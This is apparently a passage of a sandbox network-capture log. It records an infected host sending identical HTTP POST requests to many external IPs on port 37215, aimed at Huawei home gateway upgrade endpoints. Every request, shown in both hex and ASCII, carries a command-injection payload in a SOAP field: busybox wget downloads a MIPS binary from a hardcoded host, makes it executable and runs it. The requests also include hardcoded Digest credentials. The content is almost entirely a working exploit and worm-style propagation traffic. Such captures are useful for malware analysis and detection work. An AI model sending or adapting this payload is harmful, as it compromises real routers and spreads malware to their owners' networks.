                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        68192.168.2.1434798156.34.3.19137215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092637062 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        69192.168.2.1441222197.27.187.9737215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092644930 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        70192.168.2.1448226197.225.49.6637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092675924 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        71192.168.2.1437528156.21.179.12537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092691898 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        72192.168.2.1441936156.188.19.11437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092721939 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        73192.168.2.1433344156.99.213.6537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092753887 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        74192.168.2.1448238197.164.250.12137215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092782021 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        75192.168.2.1460576197.151.100.12537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092806101 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        76192.168.2.143757641.148.174.16337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092819929 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        77192.168.2.145259641.92.140.21637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092859030 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 